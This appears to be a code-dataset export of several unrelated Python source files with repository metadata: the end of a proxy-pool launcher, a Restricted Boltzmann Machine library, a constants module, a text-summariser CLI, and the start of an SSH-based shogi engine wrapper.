"""
def __init__(self):
self.collector = Collector()
self.validator = Validator()
self.detector = Detector()
self.scanner = Scaner()
self.tentacle = Tentacle()
self.proxyList = Manager().list()
def run_validator(self,proxyList):
self.validator.run(proxyList)
def run_collector(self,proxyList):
self.collector.run(proxyList)
def run_detector(self,*params):
self.detector.run()
def run_scanner(self,*params):
self.scanner.run()
def run_tentacle(self,*params):
self.tentacle.run()
def work(self):
"""
项目启动,根据config中的MODE配置执行对应的部件
这样可以隔离部件功能,耦合性较低。异步多进程执行需要
共享变量,使用了multiprocessing的Manager来生成
共享List.
"""
pool = Pool(5)
func = []
for i in MODE:
if MODE[i]:
func.append(eval('self.'+RUN_FUNC[i]))
[pool.apply_async(fun,args=(self.proxyList,)) for fun in func]
pool.close()
app.run(host='0.0.0.0',port=2020)
| 24.838235
| 70
| 0.625222
| 1,244
| 0.680898
| 0
| 0
| 0
| 0
| 0
| 0
| 430
| 0.235359
|
a2482ec97e97d9e65a4d8d49711236d2566859ca
| 30,410
|
py
|
Python
|
ml/rbms/core.py
|
torfjelde/ml
|
6ae3a5543663a7adfe3b6f1c596093c123fa2b88
|
[
"MIT"
] | null | null | null |
ml/rbms/core.py
|
torfjelde/ml
|
6ae3a5543663a7adfe3b6f1c596093c123fa2b88
|
[
"MIT"
] | null | null | null |
ml/rbms/core.py
|
torfjelde/ml
|
6ae3a5543663a7adfe3b6f1c596093c123fa2b88
|
[
"MIT"
] | null | null | null |
import abc
import logging
from enum import Enum
from tqdm import tqdm
from ml import np
from ml.functions import sigmoid, dot_batch, bernoulli_from_probas
_log = logging.getLogger("ml")
class UnitType(Enum):
GAUSSIAN = 1
BERNOULLI = 2
class RBMSampler(object):
"""Sampler used in training of RBMs for estimating the gradient.
"""
def __init__(self, args):
super(RBMSampler, self).__init__()
self.args = args
class RBM:
"""
Restricted Boltzmann Machine with either Bernoulli or Gaussian
visible/hidden units.
Attributes
---------
num_visible: int
Number of visible units.
num_hidden: int
Number of hidden units.
visible_type: UnitType or str, default='bernoulli'
Type of random variable the visible units are assumed to be.
hidden_type: UnitType or str, default='bernoulli'
Type of random variable the hidden units are assumed to be.
estimate_visible_sigma: bool, default=False
Whether or not to estimate the variance of the visible units.
If :attr:`visible_type` is non-Gaussian, then this has no effect.
estimate_hidden_sigma: bool, default=False
Whether or not to estimate the variance of the hidden units.
If :attr:`hidden_type` is non-Gaussian, then this has no effect.
sampler_method: str, default='cd'
Specifies the method used in the sampling process when approximating
the gradient.
Available methods are:
- Contrastive Divergence (CD)
- Persistent Contrastive Divergence (PCD)
- Parallel Tempering (PT)
See :func:`RBM.grad` for more information about the
effects of the different available methods.
variables: list[array-like]
Holds the learnable parameters of the machine. This is used by
:func:`RBM.step` to deduce what parameters to update.
See Also
--------
:func:`RBM.grad` for more information about samplers.
"""
def __init__(self, num_visible, num_hidden,
visible_type='bernoulli', hidden_type='bernoulli',
estimate_visible_sigma=False, estimate_hidden_sigma=False,
sampler_method='cd'):
super(RBM, self).__init__()
self._warned_acceptance = 0
self.num_visible = num_visible
self.num_hidden = num_hidden
if sampler_method.lower() not in {'cd', 'pcd', 'pt'}:
raise ValueError(f"{sampler_method} is not supported")
self.sampler_method = sampler_method.lower()
# used by `PCD` sampler
self._prev = None
if isinstance(visible_type, str):
self.visible_type = getattr(UnitType, visible_type.upper())
else:
self.visible_type = visible_type
if isinstance(hidden_type, str):
self.hidden_type = getattr(UnitType, hidden_type.upper())
else:
self.hidden_type = hidden_type
self.estimate_visible_sigma = estimate_visible_sigma
self.estimate_hidden_sigma = estimate_hidden_sigma
self.v_bias, self.h_bias, self.v_sigma, self.h_sigma, self.W = self.initialize(
num_visible,
num_hidden
)
self._variables = [self.v_bias, self.h_bias, self.W]
if self.estimate_visible_sigma:
self._variables.append(self.v_sigma)
if self.estimate_hidden_sigma:
self._variables.append(self.h_sigma)
@property
def variables(self):
return self._variables
@staticmethod
def initialize(num_visible, num_hidden):
# biases for visible and hidden, respectively
v_bias = np.zeros(num_visible)
h_bias = np.zeros(num_hidden)
# weight matrix
W = np.random.normal(0.0, 0.01, (num_visible, num_hidden))
# variances
v_sigma = np.ones(num_visible)
h_sigma = np.ones(num_hidden)
return v_bias, h_bias, v_sigma, h_sigma, W
def energy(self, v, h):
if self.visible_type == UnitType.BERNOULLI:
visible = np.matmul(v, self.v_bias)
elif self.visible_type == UnitType.GAUSSIAN:
visible = ((v - self.v_bias) ** 2) / (self.v_sigma ** 2
+ np.finfo(np.float32).eps)
visible = 0.5 * np.sum(visible, axis=1)
# term only dependent on hidden
if self.hidden_type == UnitType.BERNOULLI:
hidden = np.matmul(h, self.h_bias)
elif self.hidden_type == UnitType.GAUSSIAN:
hidden = ((h - self.h_bias) ** 2) / (self.h_sigma ** 2
+ np.finfo(np.float32).eps)
hidden = 0.5 * np.sum(hidden, axis=1)
# "covariance" term
# v^T W = sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = np.matmul(v, self.W)
# v^T W h = sum_{\mu} h_{\mu} sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = dot_batch(h, covariance)
return - (visible + hidden + covariance)
def mean_visible(self, h, beta=1.0):
r"""
Computes :math:`\mathbb{E}[\mathbf{v} \mid \mathbf{h}]`.
It can be shown that this expectation equals: [1]_
- Bernoulli:
.. math::
:nowrap:
\begin{equation}
\mathbb{E}[\mathbf{v} \mid \mathbf{h}] =
p \big( V_{i} = 1 \mid \mathbf{h} \big) = \text{sigmoid}
\Bigg( \beta \bigg( b_{i} + \sum_{\mu=1}^{|\mathcal{H}|} W_{i \mu} \frac{h_{\mu}}{\sigma_{\mu}} \bigg) \Bigg)
\end{equation}
- Gaussian:
.. math::
:nowrap:
\begin{equation*}
\mathbb{E}[\mathbf{v} \mid \mathbf{h}] = b_i + \sigma_i \sum_{\mu=1}^{|\mathcal{H}|} W_{i \mu} \frac{h_{\mu}}{\sigma_{\mu}}
\end{equation*}
where :math:`\sigma_{\mu} = 1` if :math:`H_\mu` is a Bernoulli random variable.
Notes
-----
Observe that the expectation when using Gaussian units is
independent of :math:`\beta`. To see the effect :math:`\beta` has
on the Gaussian case, see :func:`RBM.proba_visible`.
References
----------
.. [1] Fjelde, T. E., Restricted Boltzmann Machines, , (), (2018).
"""
mean = self.v_bias + (self.v_sigma *
np.matmul(h / self.h_sigma, self.W.T))
if self.visible_type == UnitType.BERNOULLI:
return sigmoid(mean * beta)
elif self.visible_type == UnitType.GAUSSIAN:
return mean
def mean_hidden(self, v, beta=1.0):
"Computes conditional expectation E[h | v]."
mean = self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)
if self.hidden_type == UnitType.BERNOULLI:
return sigmoid(mean * beta)
elif self.hidden_type == UnitType.GAUSSIAN:
return mean
def sample_visible(self, h, beta=1.0):
mean = self.mean_visible(h, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
v = bernoulli_from_probas(mean)
elif self.visible_type == UnitType.GAUSSIAN:
v = np.random.normal(loc=mean,
scale=self.v_sigma ** 2 / beta,
size=mean.shape)
else:
raise ValueError(f"unknown type {self.visible_type}")
return v
def sample_hidden(self, v, beta=1.0):
mean = self.mean_hidden(v, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
h = bernoulli_from_probas(mean)
elif self.visible_type == UnitType.GAUSSIAN:
h = np.random.normal(loc=mean,
scale=(self.h_sigma ** 2 / beta),
size=(mean.shape))
else:
raise ValueError(f"unknown type {self.visible_type}")
return h
def proba_visible(self, h, v=None, beta=1.0):
mean = self.mean_visible(h, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
p = mean
elif self.visible_type == UnitType.GAUSSIAN:
z = np.clip((v - mean) ** 2 / (2.0 * self.v_sigma ** 2),
-30.0, 30.0)
z *= beta
p = (np.exp(z) / (np.sqrt(2 * np.pi) * self.v_sigma
+ np.finfo(np.float32).eps))
else:
raise ValueError(f"unknown type {self.visible_type}")
return p
def sample(self, v, beta=1.0):
return self.sample_visible(self.sample_hidden(v, beta=beta), beta=beta)
def proba_hidden(self, v, h=None, beta=1.0):
mean = self.mean_hidden(v, beta=beta)
if self.hidden_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
p = mean
elif self.hidden_type == UnitType.GAUSSIAN:
z = np.clip((h - mean) ** 2 / (2.0 * self.h_sigma ** 2),
-30.0, 30.0)
z *= beta
p = (np.exp(z) / (np.sqrt(2 * np.pi) * self.h_sigma
+ np.finfo(np.float32).eps))
else:
raise ValueError(f"unknown type {self.hidden_type}")
return p
def free_energy(self, v, beta=1.0, raw=False):
if self.hidden_type == UnitType.BERNOULLI:
hidden = self.h_bias + np.matmul((v / self.v_sigma), self.W)
hidden *= beta
hidden = - np.sum(np.log(1.0 + np.exp(np.clip(hidden, -30, 30))),
axis=1)
elif self.hidden_type == UnitType.GAUSSIAN:
# TODO: Implement
# Have the formulas, but gotta make sure yo!
hidden = np.sum(
1 / (2 * self.h_sigma) * (
self.h_bias ** 2
- (self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)) ** 2
),
axis=1
)
hidden -= 0.5 * self.num_hidden * np.log(2 * np.pi) + np.sum(np.log(self.h_sigma))
# raise NotImplementedError()
if self.visible_type == UnitType.BERNOULLI:
visible = - np.matmul(v, self.v_bias)
visible *= beta
elif self.visible_type == UnitType.GAUSSIAN:
visible = 0.5 * np.sum(
((v - self.v_bias) ** 2)
/ (self.v_sigma ** 2 / beta + np.finfo(np.float32).eps),
axis=1
)
else:
raise ValueError(f"unknown type {self.visible_type}")
# sum across batch to obtain log of joint-likelihood
if raw:
return hidden + visible
else:
return np.mean(hidden + visible)
def contrastive_divergence(self, v_0,
k=1,
h_0=None,
burnin=-1,
beta=1.0):
"""Contrastive Divergence.
Parameters
----------
v_0: array-like
Visible state to initialize the chain from.
k: int
Number of steps to use in CD-k.
h_0: array-like, optional
Visible states to initialize the chain.
If not specified, will sample conditioned on visisble.
Returns
-------
h_0, h, v_0, v: arrays
``h_0`` and ``v_0`` are the initial states for the hidden and
visible units, respectively.
``h`` and ``v`` are the final states for the hidden and
visible units, respectively.
"""
if h_0 is None:
h_0 = self.sample_hidden(v_0, beta=beta)
v = v_0
h = h_0
for t in range(k):
v = self.sample_visible(h, beta=beta)
h = self.sample_hidden(v, beta=beta)
return v_0, h_0, v, h
def reset_sampler(self):
if self.sampler_method == 'pcd':
self._prev = None
def _init_parallel_tempering(self, v, betas=None, num_temps=10, **kwargs):
# 1. Initialize list of samples
if betas is None:
n = num_temps
else:
n = len(betas)
return np.tile(v, (n, 1, 1))
def parallel_tempering(self, vs, hs=None,
k=1,
betas=None,
max_temp=100, num_temps=10,
include_negative_shift=False):
# TODO: Performing sampling in parallel, rather than using a loop
# 1. Allow `self.contrastive_divergence` to take on arrays of betas
# 2. Stack betas and initial samples
# 3. Perform sampling
# 4. Unstack
batch_size = vs[0].shape[0]
# 1. Initialize list of samples
if betas is None:
betas = np.linspace(1, max_temp, num_temps) ** (-1)
R = len(betas)
res = []
if include_negative_shift:
neg_res = []
# 2. Perform gibbs sampling for tempered distributions
for r in range(R):
v = vs[r]
if hs is not None:
h = hs[r]
else:
h = None
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
k=k,
beta=betas[r],
h_0=h
)
res.append((v_k, h_k))
if include_negative_shift:
neg_res.append((v_0, h_0))
# 3. Simulated Annealing to perform swaps ("exchange particles")
for r in range(R - 1, 0, -1):
a = np.exp((betas[r] - betas[r - 1]) *
(self.energy(*res[r]) - self.energy(*res[r - 1])))
u = np.random.random(batch_size)
# acceptance mask
acc_mask = (u < a).reshape(batch_size, 1)
# reject mask
rej_mask = ~acc_mask
v = res[r][0] * acc_mask + res[r - 1][0] * rej_mask
h = res[r][1] * acc_mask + res[r - 1][1] * rej_mask
res[r - 1] = v, h
# TODO: this is useless, right? We're not ever using `res[r]` again
# in this iteration
v = res[r - 1][0] * acc_mask + res[r][0] * rej_mask
h = res[r - 1][1] * acc_mask + res[r][1] * rej_mask
res[r] = v, h
# warn user if very small/large number of samples rejected/accepted
# but don't if the `batch_size` is super small..
if r == 1 and batch_size > 2 and self._warned_acceptance < 10:
num_acc = acc_mask[acc_mask].shape[0]
if num_acc >= 0.9 * batch_size:
_log.warn(f"Large portion of tempered samples accepted ({num_acc} / {batch_size})")
self._warned_acceptance += 1
elif num_acc <= 0.1 * batch_size:
_log.warn(f"Small portion of tempered samples accepted ({num_acc} / {batch_size})")
self._warned_acceptance += 1
# possibly perform same for the negative shift
if include_negative_shift:
for r in range(R - 1, 0, -1):
a = np.exp((betas[r] - betas[r - 1]) *
(self.energy(*neg_res[r]) - self.energy(*neg_res[r - 1])))
u = np.random.random(batch_size)
# acceptance mask
acc_mask = (u < a).reshape(batch_size, 1)
# reject mask
rej_mask = ~acc_mask
v = neg_res[r][0] * acc_mask + neg_res[r - 1][0] * rej_mask
h = neg_res[r][1] * acc_mask + neg_res[r - 1][1] * rej_mask
neg_res[r - 1] = v, h
v = neg_res[r - 1][0] * acc_mask + neg_res[r][0] * rej_mask
h = neg_res[r - 1][1] * acc_mask + neg_res[r][1] * rej_mask
neg_res[r] = v, h
res_v = [r[0] for r in res]
res_h = [r[1] for r in res]
# return final state
if include_negative_shift:
neg_res_v = [r[0] for r in neg_res]
neg_res_h = [r[1] for r in neg_res]
return neg_res_v, neg_res_h, res_v, res_h
else:
return res_v, res_h
def _update(self, grad, lr=0.1):
# in case using `cupy`, can't use `np.shape`
# to obtain "shape" of single element; this is a fix
lr = np.asarray(lr)
gamma = lr
for i in range(len(self.variables)):
if lr.shape:
gamma = lr[i]
self.variables[i] -= gamma * grad[i]
def _apply_weight_decay(self, lmbda=0.01):
for i in range(len(self.variables)):
# default is gradient DEscent, so weight-decay also switches signs
self.variables[i] += lmbda * self.variables[i]
def step(self, v, k=1, lr=0.1, lmbda=0.0, **sampler_kwargs):
"Performs a single gradient DEscent step on the batch `v`."
# compute gradient for each observed visible configuration
grad = self.grad(v, k=k, **sampler_kwargs)
# update parameters
self._update(grad, lr=lr)
# possibly apply weight-decay
if lmbda > 0.0:
self._apply_weight_decay(lmbda=lmbda)
def reconstruct(self, v, num_samples=100):
samples = self.sample_visible(self.sample_hidden(v))
for _ in range(num_samples - 1):
samples += self.sample_visible(self.sample_hidden(v))
probs = samples / num_samples
return probs
def grad(self, v, burnin=-1, persist=False, **sampler_kwargs):
if self.sampler_method.lower() == 'cd':
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
**sampler_kwargs
)
elif self.sampler_method.lower() == 'pcd':
# Persistent Contrastive Divergence
if self._prev is not None:
v_0, h_0 = self._prev
else:
# ``burnin`` specified, we perform this to initialize the chain
if burnin > 0:
_log.info(f"Performing burnin of {burnin} steps to initialize PCD")
_, _, h_0, v_0 = self.contrastive_divergence(v, k=burnin, **sampler_kwargs)
else:
h_0 = self.sample_hidden(v, **sampler_kwargs)
v_0 = v
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
h_0=h_0,
**sampler_kwargs
)
# persist
self._prev = (v_k, h_k)
elif self.sampler_method.lower() == 'pt':
h_0 = None
if self._prev is not None:
v_0, h_0 = self._prev
else:
_log.info("Initializing PT chain...")
v_0 = self._init_parallel_tempering(v, **sampler_kwargs)
# FIXME: make compatible with `parallel_tempering` returning
# all the states
if h_0 is None:
v_0, h_0, v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
include_negative_shift=True,
**sampler_kwargs
)
elif sampler_kwargs.get("include_negative_shift", False):
v_0, h_0, v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
**sampler_kwargs
)
else:
# FIXME: make compatible with `parallel_tempering` returning
# all the states
v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
**sampler_kwargs
)
if persist:
self._prev = (v_k, h_k)
# take the first tempered distribution, i.e. the one corresponding
# the target distribution
v_0 = v_0[0]
h_0 = h_0[0]
v_k = v_k[0]
h_k = v_k[0]
else:
raise ValueError(f"{self.sampler_method} is not supported")
# all expressions below using `v` or `mean_h` will contain
# AT LEAST one factor of `1 / v_sigma` and `1 / h_sigma`, respectively
# so we include those right away
v_0 = v_0 / self.v_sigma
v_k = v_k / self.v_sigma
mean_h_0 = self.mean_hidden(v_0) / self.h_sigma
mean_h_k = self.mean_hidden(v_k) / self.h_sigma
# Recall: `v_sigma` and `h_sigma` has no affect if they are set to 1
# v_0 / (v_sigma^2) - v_k / (v_sigma^2)
delta_v_bias = (v_0 - v_k) / self.v_sigma
# E[h_0 | v_0] / (h_sigma^2) - E[h_k | v_k] / (h_sigma^2)
delta_h_bias = (mean_h_0 - mean_h_k) / self.h_sigma
# Gradient wrt. W
# (v_0 / v_sigma) (1 / h_sigma) E[h_0 | v_0] - (v_k / v_sigma) (1 / h_sigma) E[h_k | v_k]
x = mean_h_0.reshape(mean_h_0.shape[0], 1, mean_h_0.shape[1])
y = v_0.reshape(v_0.shape[0], v_0.shape[1], 1)
z_0 = np.matmul(y, x)
x = mean_h_k.reshape(mean_h_k.shape[0], 1, mean_h_k.shape[1])
y = v_k.reshape(v_k.shape[0], v_k.shape[1], 1)
z_k = np.matmul(y, x)
delta_W = z_0 - z_k
# average over batch take the negative
delta_v_bias = - np.mean(delta_v_bias, axis=0)
delta_h_bias = - np.mean(delta_h_bias, axis=0)
delta_W = - np.mean(delta_W, axis=0)
grads = [delta_v_bias, delta_h_bias, delta_W]
# variances
if self.visible_type == UnitType.GAUSSIAN \
and self.estimate_visible_sigma:
# in `GaussianRBM`, where only VISIBLE units Gaussian,
# we only compute `v_sigma`
# (((v_0 - b)^2 / (v_sigma^2)) - (v / (v_sigma)) \sum_{\mu} E[h_{\mu} | v] / sigma_{\mu}) / v_sigma
delta_v_sigma_data = (((v_0 - (self.v_bias / self.v_sigma)) ** 2)
- v_0 * (np.matmul(mean_h_0, self.W.T)))
delta_v_sigma_model = (((v_k - (self.v_bias / self.v_sigma)) ** 2)
- v_k * (np.matmul(mean_h_k, self.W.T)))
delta_v_sigma = (delta_v_sigma_data - delta_v_sigma_model) / self.v_sigma
# average over batch take the negative
delta_v_sigma = - np.mean(delta_v_sigma, axis=0)
grads.append(delta_v_sigma)
if self.hidden_type == UnitType.GAUSSIAN \
and self.estimate_hidden_sigma:
# TODO: Implement
raise NotImplementedError("gradients for gaussian hidden"
" units not yet implemented")
delta_h_sigma_data = (((h_0 - (self.h_bias / self.h_sigma)) ** 2)
- h_0 * (np.matmul(mean_h_0, self.W.T)))
delta_h_sigma_model = (((h_k - (self.h_bias / self.h_sigma)) ** 2)
- h_k * (np.matmul(mean_h_k, self.W.T)))
delta_h_sigma = delta_h_sigma_data - delta_h_sigma_model
# average over batch take the negative
delta_h_sigma = - np.mean(delta_h_sigma, axis=0)
grads.append(delta_h_sigma)
return grads
def fit(self, train_data,
k=1,
learning_rate=0.01,
num_epochs=5,
batch_size=64,
test_data=None,
show_progress=True,
weight_decay=0.0,
early_stopping=-1,
callbacks={},
**sampler_kwargs):
"""
Parameters
----------
train_data: array-like
Data to fit RBM on.
k: int, default=1
Number of sampling steps to perform. Used by CD-k, PCD-k and PT.
learning_rate: float or array, default=0.01
Learning rate used when updating the parameters.
Can also be array of same length as `self.variables`, in
which case the learning rate at index `i` will be used to
to update ``RBM.variables[i]``.
num_epochs: int, default=5
Number of epochs to train.
batch_size: int, default=64
Batch size to within the epochs.
test_data: array-like, default=None
Data similar to ``train_data``, but this will only be used as
validation data, not trained on.
If specified, will compute and print the free energy / negative
log-likelihood on this dataset after each epoch.
show_progress: bool, default=True
If true, will display progress bar for each epoch.
weight_decay: float, default=0.0
If greater than 0.0, weight decay will be applied to the
parameter updates. See :func:`RBM.step` for more information.
early_stopping: int, default=-1
If ``test_data`` is given and ``early_stopping > 0``, training
will terminate after epoch if the free energy of the
``test_data`` did not improve over the fast ``early_stopping``
epochs.
Returns
-------
nlls_train, nlls_test : array-like, array-like
Returns the free energy of both ``train_data`` and ``test_data``
as computed at each epoch.
"""
num_samples = train_data.shape[0]
indices = np.arange(num_samples)
np.random.shuffle(indices)
nlls_train = []
nlls = []
prev_best = None
for epoch in range(1, num_epochs + 1):
if "pre_epoch" in callbacks:
for c in callbacks["pre_epoch"]:
c(self, epoch)
# reset sampler at beginning of epoch
# Used by methods such as PCD to reset the
# initialization value.
self.reset_sampler()
# compute train & test negative log-likelihood
# TODO: compute train- and test-nll in mini-batches
# to avoid numerical problems
nll_train = float(np.mean(self.free_energy(train_data)))
nlls_train.append(nll_train)
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train):"
f" {nll_train:>20.5f}")
if test_data is not None:
nll = float(np.mean(self.free_energy(test_data)))
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test):"
f" {nll:>20.5f}")
nlls.append(nll)
# stop early if all `early_stopping` previous
# evaluations on `test_data` did not improve.
if early_stopping > 0:
if epoch > early_stopping and \
np.all([a >= prev_best for a in nlls[epoch - early_stopping:]]):
_log.info("Hasn't improved in {early_stopping} epochs; stopping early")
break
else:
# update `prev_best`
if prev_best is None:
prev_best = nll
elif nll < prev_best:
prev_best = nll
# iterate through dataset in batches
if show_progress:
bar = tqdm(total=num_samples)
for start in range(0, num_samples, batch_size):
# ensure we don't go out-of-bounds
end = min(start + batch_size, num_samples)
# take a gradient-step
self.step(train_data[start: end],
k=k,
lr=learning_rate,
lmbda=weight_decay,
**sampler_kwargs)
if "post_step" in callbacks:
for c in callbacks["post_step"]:
c(self, epoch, end)
# update progress
if show_progress:
bar.update(end - start)
if show_progress:
bar.close()
# shuffle indices for next epoch
np.random.shuffle(indices)
if "post_epoch" in callbacks:
for c in callbacks["post_epoch"]:
c(self, epoch)
# compute train & test negative log-likelihood of final batch
nll_train = float(np.mean(self.free_energy(train_data)))
nlls_train.append(nll_train)
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train): "
f"{nll_train:>20.5f}")
if test_data is not None:
nll = float(np.mean(self.free_energy(test_data)))
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test): "
f"{nll:>20.5f}")
nlls.append(nll)
return nlls_train, nlls
def dump(self, path, *attrs):
import pickle
if not attrs:
attrs = [
'num_visible',
'num_hidden',
'visible_type',
'hidden_type',
'estimate_visible_sigma',
'estimate_hidden_sigma',
'variables',
'v_bias',
'h_bias',
'W',
'v_sigma',
'h_sigma'
]
state = {}
for a in attrs:
state[a] = getattr(self, a)
with open(path, "wb") as f:
pickle.dump(state, f)
@classmethod
def load(cls, path):
import pickle
with open(path, "rb") as f:
state = pickle.load(f)
model = cls(num_visible=state['num_visible'],
num_hidden=state['num_hidden'],
visible_type=state['visible_type'],
hidden_type=state['hidden_type'],
estimate_visible_sigma=state['estimate_visible_sigma'],
estimate_hidden_sigma=state['estimate_hidden_sigma'])
for a in state:
setattr(model, a, state[a])
return model
class BernoulliRBM(RBM):
"""Restricted Boltzmann Machine (RBM) with both hidden and visible
variables assumed to be Bernoulli random variables.
"""
def __init__(self, num_visible, num_hidden):
super(BernoulliRBM, self).__init__(
num_visible,
num_hidden,
visible_type='bernoulli',
hidden_type='bernoulli'
)
| 36.638554
| 135
| 0.529037
| 30,210
| 0.993423
| 0
| 0
| 1,080
| 0.035515
| 0
| 0
| 9,876
| 0.324762
|
a248fa91871a4d64d360baf9357e2574f6ec13d4
| 218
|
py
|
Python
|
Ports.py
|
bullgom/pysnn2
|
dad5ae26b029afd5c5bf76fe141249b0f7b7a36c
|
[
"MIT"
] | null | null | null |
Ports.py
|
bullgom/pysnn2
|
dad5ae26b029afd5c5bf76fe141249b0f7b7a36c
|
[
"MIT"
] | null | null | null |
Ports.py
|
bullgom/pysnn2
|
dad5ae26b029afd5c5bf76fe141249b0f7b7a36c
|
[
"MIT"
] | null | null | null |
AP = "AP"
BP = "BP"
ARRIVE = "ARRIVE"
NEUROMODULATORS = "NEUROMODULATORS"
TARGET = "TARGET"
OBSERVE = "OBSERVE"
SET_FREQUENCY = "SET_FREQUENCY"
DEACTIVATE = "DEACTIVATE"
ENCODE_INFORMATION = "ENCODE_INFORMATION"
| 13.625
| 41
| 0.724771
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 97
| 0.444954
|
a2490cedb898fffcdd522f5198f098b39d8227c4
| 2,798
|
py
|
Python
|
src/oolongt/cli/cli.py
|
schmamps/textteaser
|
e948ac6c0a4a4a44c7011206d7df236529d7813d
|
[
"MIT"
] | 2
|
2020-02-18T09:13:13.000Z
|
2021-06-12T13:16:13.000Z
|
src/oolongt/cli/cli.py
|
schmamps/textteaser
|
e948ac6c0a4a4a44c7011206d7df236529d7813d
|
[
"MIT"
] | null | null | null |
src/oolongt/cli/cli.py
|
schmamps/textteaser
|
e948ac6c0a4a4a44c7011206d7df236529d7813d
|
[
"MIT"
] | 1
|
2019-05-05T14:43:53.000Z
|
2019-05-05T14:43:53.000Z
|
"""Command line interface for OolongT"""
import argparse
import os
import sys
import typing
from textwrap import wrap as wrap_text
from ..constants import DEFAULT_LENGTH
from ..content import Document
from ..files import get_document
from ..string import simplify
from ..typings import OptionalString, StringList
DEFAULT_WRAP = 70
def get_args():
"""Parse command line arguments if invoked directly
Returns:
object -- .img_dir: output directory, .details: get document details
"""
desc = 'A Python-based utility to summarize content.'
limit_help = 'length of summary ({}, {}, [default: {}])'.format(
'< 1: pct. of sentences', '>= 1: total sentences', DEFAULT_LENGTH)
ext_help = 'nominal extension of file [default: {}]'.format(
'txt if local, html if remote')
wrap_help = 'wrap at column number [default: {}]'.format(
DEFAULT_WRAP)
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
'path', help='path/URL to file')
parser.add_argument(
'-e', '--ext', help=ext_help, default=None)
parser.add_argument(
'-w', '--wrap', help=wrap_help, default=DEFAULT_WRAP)
parser.add_argument(
'-l', '--limit', help=limit_help, default=DEFAULT_LENGTH)
args = parser.parse_args()
if not args.path.startswith('http') and not os.path.exists(args.path):
sys.stderr.write('File {!r} does not exist.'.format(args.path))
sys.exit(1)
return args
def get_summary(doc: Document, limit: float, wrap: int) -> StringList:
"""Get summary of `doc` as StringList of lines
Arguments:
doc {Document} -- document
limit {float} -- length of summary
wrap {int} -- column wrap
Returns:
StringList -- lines of document
"""
sentences = doc.summarize(limit)
text = ' '.join(sentences)
return [text] if wrap < 1 else wrap_text(text, width=wrap)
def get_output_lines(
path: str,
ext: OptionalString,
limit: float,
wrap: int) -> typing.Generator[str, None, None]:
"""Generate lines of output
Arguments:
path {str} -- path to document
ext {OptionalString} -- nominal extension of file
limit {float} -- length of summary
wrap {int} -- column wrap
Returns:
typing.Generator[str, None, None] -- output lines
"""
doc = get_document(path, ext)
yield simplify(doc.title or path)
yield ''
for line in get_summary(doc, limit, wrap):
yield simplify(line)
def cli():
"""Collect arguments, pass for summary, output to console"""
args = get_args()
limit = float(args.limit)
wrap = int(args.wrap)
for line in get_output_lines(args.path, args.ext, limit, wrap):
print(line)
| 27.98
| 76
| 0.641172
| 0
| 0
| 613
| 0.219085
| 0
| 0
| 0
| 0
| 1,125
| 0.402073
|
a249698e484130d9327ab696efff125ba53413ba
| 15,123
|
py
|
Python
|
chotgun.py
|
hmatsuya/chotgun
|
0cee1b4ae385c57cf094376dee0ad450e308aa0a
|
[
"MIT"
] | 1
|
2021-11-04T14:26:10.000Z
|
2021-11-04T14:26:10.000Z
|
chotgun.py
|
hmatsuya/chotgun
|
0cee1b4ae385c57cf094376dee0ad450e308aa0a
|
[
"MIT"
] | 1
|
2020-08-07T06:58:09.000Z
|
2020-08-13T06:23:20.000Z
|
chotgun.py
|
hmatsuya/chotgun
|
0cee1b4ae385c57cf094376dee0ad450e308aa0a
|
[
"MIT"
] | null | null | null |
import sys
import os.path
import threading
import queue
import logging
import random
import copy
from paramiko.client import SSHClient
import paramiko
import re
import time
import os
class USIEngine:
def __init__(self, name, host, engine_path,
nodes=None, multiPV=1, threads=1,
delay=0, delay2=0):
self.name = name
self.nodes=nodes
self.multiPV = multiPV
self.quit_event = threading.Event()
self.client = SSHClient()
self.client.set_missing_host_key_policy(paramiko.client.WarningPolicy)
#self.client.load_system_host_keys()
keys = self.client.get_host_keys()
keys.clear()
self.client.connect(host)
dirname = os.path.dirname(engine_path)
command = f'cd {dirname} && {engine_path}'
self.stdin, self.stdout, self.stderr = \
self.client.exec_command(command, bufsize=0)
self.queue = queue.Queue()
self.watcher_thread = threading.Thread(target=self.stream_watcher,
name='engine_watcher', args=(self.stdout,))
self.watcher_thread.start()
self.pvs = [[]] * multiPV
self.status = 'wait'
self.position = 'startpos'
self.send('usi')
self.wait_for('usiok')
self.set_option('Threads', threads)
self.set_option('USI_Ponder', 'false')
self.set_option('NetworkDelay', delay)
self.set_option('NetworkDelay2', delay2)
self.set_option('MultiPV', multiPV)
if nodes:
self.set_option('NodesLimit', nodes)
#self.send('isready')
#self.wait_for('readyok')
def stream_watcher(self, stream):
# for line in iter(stream.readline, b''):
prog = re.compile('.*score cp (-?\d+) (?:multipv (\d+))? .*pv (.+)$')
#for line in iter(stream.readline, b''):
while (not self.quit_event.isSet()) and (not stream.closed):
line = stream.readline().strip()
if len(line):
logging.debug(f'{self.name} > {line}')
print(f'info string {self.name} > {line}', flush=True)
match = prog.match(line)
if match:
logging.debug(f'match: {match.group(1, 2, 3)}')
if match.group(2):
# multi PV
num = int(match.group(2)) - 1
else:
# single PV
num = 0
logging.debug(f'{self.name}: Found score of pv {num}')
self.pvs[num] = [int(match.group(1)), match.group(3)]
# bestmove
if line.startswith('bestmove'):
self.status = 'wait'
self.queue.put(line)
logging.debug(f'{self.name}: terminating the engine watcher thread')
def set_option(self, name, value):
